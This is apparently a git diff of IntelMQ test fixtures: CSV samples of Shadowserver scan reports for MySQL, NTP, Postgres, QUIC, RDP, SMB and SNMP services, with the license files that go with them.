+"2010-02-10 00:00:00",192.168.0.1,tcp,3306,node01.example.com,mysql,,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",10,5.7.37-0ubuntu0.18.04.1,1,1,1,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,N,N,N,TLSv1.2,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,2,sha256WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,,Y,unknown,,"x509: failed to load system roots and no roots provided",,
+"2010-02-10 00:00:01",192.168.0.2,tcp,3306,node02.example.com,mysql,,64512,ZZ,Region,City,0,0,,10,5.7.30-0ubuntu0.18.04.1-log,1,1,1,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,N,N,N,TLSv1.2,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,2,sha256WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,,Y,unknown,,"x509: failed to load system roots and no roots provided",,
+"2010-02-10 00:00:02",192.168.0.3,tcp,3306,node03.example.com,mysql,,64512,ZZ,Region,City,0,0,"Retail Trade",10,8.0.23,1,1,1,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,N,N,N,TLSv1.2,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,2,sha256WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,,Y,unknown,,"x509: failed to load system roots and no roots provided",,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/netis_router.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_netis_router.csv
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/netis_router.csv
rename to intelmq/tests/bots/parsers/shadowserver/testdata/scan_netis_router.csv
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/netis_router.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_netis_router.csv.license
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/netis_router.csv.license
rename to intelmq/tests/bots/parsers/shadowserver/testdata/scan_netis_router.csv.license
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ntp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ntp.csv
index dd5392123..5f566b56e 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ntp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ntp.csv
@@ -1,3 +1,4 @@
-"timestamp","ip","protocol","port","hostname","asn","geo","region","city","version","clk_wander","clock","error","frequency","jitter","leap","mintc","noise","offset","peer","phase","poll","precision","processor","refid","reftime","rootdelay","rootdispersion","stability","state","stratum","system","tai","tc","naics","sic","sector"
-"2019-09-04 01:16:27","198.123.245.134","udp",123,"example.local",5678,"AA","LOCATION","LOCATION",4,"0.000","0xE1198EEB.21E18AD4",,"0.000","0.000",0,3,,"0.000",,,,"-22","unknown","198.123.245.4","0xE1198C78.D013546A","0.000","0.000",,,2,"UNIX",,7,517311,0,
-"2019-09-04 01:16:27","198.123.245.51","udp",123,"example.local",5678,"AA","LOCATION","LOCATION",,,"0xE1198EEB.1675E416","0.06","153.780",,0,,,,62164,,6,,,"198.123.245.123","0xE1198EE2.84FFA639","2.240","1.460",,,2,"cisco",,,517311,0,
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","version","clk_wander","clock","error","frequency","jitter","leap","mintc","noise","offset","peer","phase","poll","precision","processor","refid","reftime","rootdelay","rootdispersion","stability","state","stratum","system","tai","tc","naics","sic","sector"
+"2010-02-10 00:00:00",192.168.0.1,udp,123,node01.example.com,ntpversion,64512,ZZ,Region,City,4,0.000,0xE62E08E9.F0A774D2,,0.000,0.000,3,3,,0.000,,,,-20,unknown,INIT,0x00000000.00000000,0.000,0.000,,,16,UNIX,,3,0,0,
+"2010-02-10 00:00:01",192.168.0.2,udp,123,node02.example.com,ntpversion,64512,ZZ,Region,City,"ntpd 4.2.8p10@1.3728-o Sun Sep 17 20:40:05 UTC 2017 (1)",2.640,0xe62e0cad.c2ff7c82,,-11.962,0.000,0,3,,12.719,,,,-18,mips64,203.248.240.103,0xe62e0be6.60888599,6.493,1093.842,,,3,Linux/2.6.38+,,10,0,0,
+"2010-02-10 00:00:02",192.168.0.3,udp,123,node03.example.com,ntpversion,64512,ZZ,Region,City,4,,0xE62E0CAD.BCF46BB4,,46.122,5.271,0,,0.849,3.136,,,10,-28,unknown,194.25.7.190,0xE62E08C0.6967CAFB,37.173,69.399,0.028,4,3,UNIX,,,0,0,"Communications, Service Provider, and Hosting Service"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv
new file mode 100644
index 000000000..8c1d6f725
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","version","asn","geo","region","city","naics","sic","sector","supported_protocols","protocol_error_code","protocol_error_file","protocol_error_line","protocol_error_message","protocol_error_routine","protocol_error_severity","protocol_error_severity_v","startup_error_code","startup_error_file","startup_error_line","startup_error_message","startup_error_routine","startup_error_severity","startup_error_severity_v","client_ssl","handshake","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","cert_valid","self_signed","cert_expired","validation_level","browser_trusted","browser_error","raw_cert","raw_cert_chain"
+"2010-02-10 00:00:00",192.168.0.1,tcp,5432,node01.example.com,postgres,,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",1.0-3.0,0A000,postmaster.c,1798,"unsupported frontend protocol 255.255: server supports 1.0 to 3.0",ProcessStartupPacket,FATAL,,28000,postmaster.c,1893,"no PostgreSQL user name specified in startup packet",ProcessStartupPacket,FATAL,,N,,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,,,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,,Y,,,,,
+"2010-02-10 00:00:01",192.168.0.2,tcp,5432,node02.example.com,postgres,,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",1.0-3.0,0A000,postmaster.c,1798,"unsupported frontend protocol 255.255: server supports 1.0 to 3.0",ProcessStartupPacket,FATAL,,28000,postmaster.c,1893,"no PostgreSQL user name specified in startup packet",ProcessStartupPacket,FATAL,,N,,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,,,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,,Y,,,,,
+"2010-02-10 00:00:02",192.168.0.3,tcp,5432,node03.example.com,postgres,,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",1.0-3.0,0A000,postmaster.c,1798,"unsupported frontend protocol 255.255: server supports 1.0 to 3.0",ProcessStartupPacket,FATAL,,28000,postmaster.c,1893,"no PostgreSQL user name specified in startup packet",ProcessStartupPacket,FATAL,,N,,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,,,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,,Y,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_postgres.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv
new file mode 100644
index 000000000..c9fb18896
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","version_field_1","version_field_2","version_field_3","version_field_4"
+"2022-01-10 14:31:17","176.255.0.0","udp",443,"test1.example.com","quic",5607,"UK","LONDON","LONDON",517311,,"Q050",,"Q046","Q043"
+"2022-01-10 14:31:17","24.244.0.0","udp",443,,"quic",6327,"CA","SASKATCHEWAN","MEACHAM",517311,,"Q050","Q046",,"Q043"
+"2022-01-10 14:31:17","23.60.0.0","udp",443,"test3.example.com","quic",20940,"JP","OSAKA","OSAKA",517919,,,"Q050","Q046","Q043"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_quic.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdp.csv
index 65cf1e23b..4bac90f19 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdp.csv
@@ -1,3 +1,3 @@
-"timestamp","ip","port","hostname","tag","handshake","asn","geo","region","city","rdp_protocol","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","naics","sic","sector","tlsv13_support","tlsv13_cipher","cve20190708_vulnerable","bluekeep_vulnerable"
+"timestamp","ip","port","hostname","tag","handshake","asn","geo","region","city","rdp_protocol","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","naics","sic","sector","tlsv13_support","tlsv13_cipher","cve20190708_vulnerable","bluekeep_vulnerable","jarm"
 "2019-09-04 15:45:51","198.123.245.178",5678,,"rdp",,5678,"AA","LOCATION","LOCATION","RDP",5678,"KABESRV.KABE.local","KABESRV.KABE.local","2019-04-29 02:22:06","2019-10-29 02:22:06","EC:BB:4D:DB:9F:0C:D3:FF:5B:49:EA:B1:56:62:B6:A7:5D:60:54:42","1EF2B37AF850C9BF4E88F18177001D6B",2,"sha256WithRSAEncryption","rsaEncryption","B7:C9:F4:07:D5:C0:75:1D:EA:0C:40:E7:26:39:C2:30:C6:13:83:7E:18:46:D8:E9:4C:45:3F:88:1B:0B:70:76","08:AC:75:FA:EB:A3:2B:44:15:DE:6D:A7:0B:C0:AE:17:94:F3:55:D9:EC:70:AC:5B:B7:94:79:F0:D7:84:83:89:CB:A9:11:E0:08:D7:54:4D:33:85:89:D2:A8:DD:9D:15:F4:CC:95:DE:6A:E3:DF:6B:FA:8B:27:E3:DA:16:AF:0A","BC:6E:C3:E2:98:22:EC:BA:5B:30:E2:53:FD:4A:9D:FF",517311,0,,,,"N","N"
 "2019-09-04 15:45:51","198.123.245.233",5678,,"rdp",,5678,"AA","LOCATION","LOCATION","RDP",5678,"RAMBLA01.rambla.local","RAMBLA01.rambla.local","2019-04-16 06:15:20","2019-10-16 06:15:20","7A:67:1F:F8:87:C6:B0:AC:A9:84:15:B7:40:EC:CB:19:AA:E3:19:52","3FF3EBC5CF154BA54D128A8548C8AAF5",2,"sha1WithRSAEncryption","rsaEncryption","8F:CD:7D:C4:80:2D:8D:9B:06:A0:40:18:9F:ED:73:7A:BA:83:55:BE:1B:56:83:A2:97:DF:BB:B4:06:57:CB:F1","E8:9B:9A:93:69:B4:58:01:D8:46:C2:DC:01:20:1E:DD:93:E1:EB:E3:9D:6B:65:A0:C5:00:6C:A4:44:08:FE:A4:A6:19:FF:55:79:F2:AA:61:68:C8:1C:B0:CE:78:EB:84:DD:29:9D:64:2F:4E:25:31:3A:6C:B8:02:C9:AF:F5:1F","38:73:6A:B3:AA:41:69:C9:BA:E7:3D:D7:40:16:F8:AA",517311,0,"Information Technology",,,"N","N"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_msrdpeudp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdpeudp.csv
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/scan_msrdpeudp.csv
rename to intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdpeudp.csv
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdpeudp.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdpeudp.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_rdpeudp.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv
index ee5165f9c..fc7fe2fff 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv
@@ -1,3 +1,4 @@
-"timestamp","ip","port","hostname","asn","geo","region","city","naics","sic","smb_implant","arch","key"
-"2017-06-24 06:12:04","198.51.100.39",445,,8559,"AT","BURGENLAND","EISENSTADT",0,0,"N",,
-"2017-06-24 06:22:59","198.51.100.94",445,,8447,"AT","OBEROSTERREICH","GUNSKIRCHEN",0,0,"Y","x86","0xcb68e558"
+"timestamp","ip","port","hostname","tag","asn","geo","region","city","naics","sic","smb_implant","arch","key","smbv1_support","smb_major_number","smb_minor_number","smb_revision","smb_version_string"
+"2010-02-10 00:00:00",192.168.0.1,445,node01.example.com,smb,64512,ZZ,Region,City,0,0,N,,,N,2,1,0,"SMB 2.1"
+"2010-02-10 00:00:01",192.168.0.2,445,node02.example.com,smb,64512,ZZ,Region,City,0,0,N,,,N,2,1,0,"SMB 2.1"
+"2010-02-10 00:00:02",192.168.0.3,445,node03.example.com,smb,64512,ZZ,Region,City,0,0,N,,,N,2,1,0,"SMB 2.1"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv.license
index 942a94035..f512a890e 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv.license
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_smb.csv.license
@@ -1,2 +1,2 @@
-SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
 SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv
index c1f248019..39b604219 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv
@@ -1,87 +1,4 @@
-"timestamp","ip","protocol","port","hostname","sysdesc","sysname","asn","geo","region","city","version","naics","sic","sector"
-"2014-03-16 03:45:50","129.113.21.93","udp",161,"doesnotexist.utpa.edu","Hardware: x86 Family 6 Model 8 Stepping 6 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)","ORSONKA",22864,"US","TEXAS","EDINBURG",2,0,0,
-"2014-03-16 03:45:51","79.2.242.16","udp",17080,"host16-242-dynamic.2-79-r.retail.telecomitalia.it","ADSL Modem","tc",3269,"IT","EMILIA-ROMAGNA","RAVENNA",2,0,0,
-"2014-03-16 03:45:51","95.109.21.127","udp",161,"ip6-127.skekraft.riksnet.se",,,34610,"SE","VASTERBOTTENS LAN","UMEA",2,0,0,
-"2014-03-16 03:45:51","201.8.4.57","udp",161,"201-8-4-57.user.veloxzone.com.br","Linux ADSL2PlusRouter 2.6.19 #7 Tue Apr 9 17:06:16 CST 2013 mips","TD5130",7738,"BR","RIO DE JANEIRO","RIO DE JANEIRO",2,0,0,
-"2014-03-16 03:45:51","76.186.106.223","udp",161,"cpe-76-186-106-223.tx.res.rr.com","Linux R6100 2.6.31 #1 Tue Jun 4 06:50:58 EDT 2013 mips MIB=01a01","Unknow",11427,"US","TEXAS","DALLAS",2,0,0,
-"2014-03-16 03:45:51","182.68.111.119","udp",10214,"abts-north-dynamic-119.111.68.182.airtelbroadband.in","110TC1","Beetel",24560,"IN","HARYANA","GURGAON",2,0,0,
-"2014-03-16 03:45:51","125.214.158.32","udp",161,"jway-125-214-158-032.jway.ne.jp","BCW710J <<HW_REV: 1.01; VENDOR: Bnmux; BOOTR: 2.4.0alpha14; SW_REV: 5.30.5; MODEL: BCW710J>>","CableHome",24249,"JP","TOKYO","TOKYO",2,0,0,
-"2014-03-16 03:45:51","74.138.148.8","udp",161,"74-138-148-8.dhcp.insightbb.com","Linux WNR1000v2 2.6.15 #199 Thu Jan 28 09:49:57 CST 2010 mips MIB=01a01","Unknow",10796,"US","KENTUCKY","LOUISVILLE",2,0,0,
-"2014-03-16 03:45:51","222.233.225.196","udp",161,,,,9318,"KR","SEOUL-T'UKPYOLSI","SEOUL",2,0,0,
-"2014-03-16 03:45:51","84.3.91.88","udp",161,"54035b58.catv.pool.telekom.hu","D-Link Wireless Voice Gateway <<HW_REV: B4; VENDOR: D-Link; BOOTR: 2.4.0beta1; SW_REV: 1.1.0.4; MODEL: DCM-704>>","CableHome",5483,"HU","BUDAPEST","BUDAPEST",2,0,0,
-"2016-07-24 04:14:33","198.51.100.152","udp",161,"198-51-100-152.example.net","4 Port VDSL IAD","nobrand",6805,"DE","BERLIN","BERLIN",2,0,0,
-"2016-07-24 04:14:33","198.51.100.67","udp",161,"198-51-100-67.example.net","4 Port VDSL IAD","nobrand",6805,"DE","BERLIN","BERLIN",2,0,0,
-"2016-07-24 04:14:33","198.51.100.125","udp",161,,,,6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:34","198.51.100.203","udp",161,,"Cisco IOS Software C880 Software (C880DATA-UNIVERSALK9-M) Version 15.2(3)T2 RELEASE SOFTWARE (fc1)Technical Support: http://www.cisco.com/techsupportCopyright (c) 1986-2012 by Cisco Systems Inc.Compiled Wed 26-Sep-12 22:05 by prod_rel_team","RTRGUT01",3320,"DE","NORDRHEIN-WESTFALEN","HERSCHEID",2,518210,737415,
-"2016-07-24 04:14:34","198.51.100.240","udp",161,"198-51-100-240.example.net","Wireless IAD",,3209,"DE","BERLIN","BERLIN",2,0,0,
-"2016-07-24 04:14:34","198.51.100.30","udp",161,,,,6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:34","198.51.100.50","udp",161,"198-51-100-50.example.net","Apple AirPort - Apple Computer 2006.  All rights Reserved","TimeCapsule",3320,"DE","BADEN-WURTTEMBERG","ULM",2,541690,874899,
-"2016-07-24 04:14:35","198.51.100.113","udp",161,"198-51-100-113.example.net","Prestige 660HW-T7C",,3209,"DE","NIEDERSACHSEN","HANNOVER",2,0,0,
-"2016-07-24 04:14:35","198.51.100.228","udp",161,"198-51-100-228.example.net","4 Port VDSL IAD","nobrand",6805,"DE","BAYERN","MUNICH",2,0,0,
-"2016-07-24 04:14:36","198.51.100.171","udp",161,,"DrayTek Corporation",,3320,"DE","SACHSEN-ANHALT","DESSAU-ROSSLAU",2,541690,874899,
-"2016-07-24 04:14:36","198.51.100.230","udp",161,"198-51-100-182.example.net","Thomson CableHome PacketCable Gateway E-MTA <<HW_REV: 2.0.; VENDOR: Thomson; BOOTR: 2.1.7i; SW_REV: ST9B.01.22; MODEL: TWG850-4U>>",,35244,"DE","HESSEN","FRANKFURT AM MAIN",2,0,0,
-"2016-07-24 04:14:36","198.51.100.23","udp",161,"198-51-100-23.example.net","4 Port VDSL IAD","nobrand",6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:36","198.51.100.116","udp",161,,"Linux creativserver.de 2.6.18-400.1.1.el5 #1 SMP Thu Dec 18 00:59:53 EST 2014 x86_64","198-51-100-116.example.net",15456,"DE","BAYERN","MUNICH",2,0,0,
-"2016-07-24 04:14:36","198.51.100.51","udp",161,"198-51-100-51.example.net","4 Port VDSL IAD","nobrand",6805,"DE","BADEN-WURTTEMBERG","BOBLINGEN",2,0,0,
-"2016-07-24 04:14:36","198.51.100.88","udp",161,,,,6805,"DE","BERLIN","BERLIN",2,518210,737415,
-"2016-07-24 04:14:36","198.51.100.107","udp",161,,,,6805,"DE","HAMBURG","HAMBURG",2,518210,737415,
-"2016-07-24 04:14:36","198.51.100.75","udp",161,,,,12355,"DE","NORDRHEIN-WESTFALEN","HAMM",2,0,0,
-"2016-07-24 04:14:36","198.51.100.12","udp",52416,,"Linux fw-0059-03-07 2.4.21-21cpsmp #1 SMP Sun Feb 11 18:18:33 IST 2007 i686",,6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:37","198.51.100.66","udp",161,"198-51-100-66.example.net","Linux R6100 2.6.31 #1 Wed Jul 3 05:22:01 CST 2013 mips MIB=01a01","Unknow",6830,"DE","NORDRHEIN-WESTFALEN","HAGEN",2,0,0,
-"2016-07-24 04:14:37","198.51.100.170","udp",161,"198-51-100-170.example.net","Hardware: x86 Family 6 Model 8 Stepping 6 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)","YVENKA",8767,"DE","BAYERN","AUGSBURG",2,517310,481302,
-"2016-07-24 04:14:37","198.51.100.67","udp",161,,"ARRIS Euro-DOCSIS 2.0 / SIP 2.0 Touchstone Telephony Modem <<HW_REV: 02; VENDOR: Arris Interactive L.L.C.; BOOTR: 5.01; SW_REV: 6.1.129.EURO.SIP; MODEL: TM502B>>",,3320,"DE","SACHSEN","CHEMNITZ",2,518210,737415,
-"2016-07-24 04:14:37","198.51.100.238","udp",161,"198-51-100-238.example.net","4 Port VDSL IAD","nobrand",6805,"DE","HESSEN","FRANKFURT AM MAIN",2,0,0,
-"2016-07-24 04:14:38","198.51.100.84","udp",161,,,,6805,"DE","BADEN-WURTTEMBERG","KORNWESTHEIM",2,0,0,
-"2016-07-24 04:14:38","198.51.100.23","udp",161,,"Broadband Residential Gateway",,3320,"DE","BERLIN","BERLIN",2,541690,874899,
-"2016-07-24 04:14:38","198.51.100.160","udp",161,,,,6805,"DE","NORDRHEIN-WESTFALEN","GUTERSLOH",2,518210,737415,
-"2016-07-24 04:14:39","198.51.100.111","udp",161,,,,6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:39","198.51.100.98","udp",161,,"4 Port VDSL IAD","nobrand",6805,"DE","BAYERN","MUNICH",2,0,0,
-"2016-07-24 04:14:39","198.51.100.227","udp",161,"198-51-100-227.example.net","Linux easy.box 198.51.100.18 #3 Thu Jul 24 16:08:30 CST 2014 mips","IAD",3209,"DE","HESSEN","DARMSTADT",2,0,0,
-"2016-07-24 04:14:39","198.51.100.248","udp",161,,"4 Port VDSL IAD","nobrand",6805,"DE","BERLIN","BERLIN",2,0,0,
-"2016-07-24 04:14:40","198.51.100.228","udp",161,,,,6805,"DE","BAYERN","MUNICH",2,0,0,
-"2016-07-24 04:14:40","198.51.100.132","udp",161,"198-51-100-132.example.net","Linux R6100 2.6.31 #1 Mon May 19 22:17:10 CST 2014 mips MIB=01a01",,6830,"DE","HESSEN","DARMSTADT",2,0,0,
-"2016-07-24 04:14:40","198.51.100.185","udp",161,,,,9022,"DE","RHEINLAND-PFALZ","LUDWIGSHAFEN",2,0,0,
-"2016-07-24 04:14:40","198.51.100.246","udp",161,,"4 Port VDSL IAD","nobrand",6805,"DE","BAYERN","MUNICH",2,0,0,
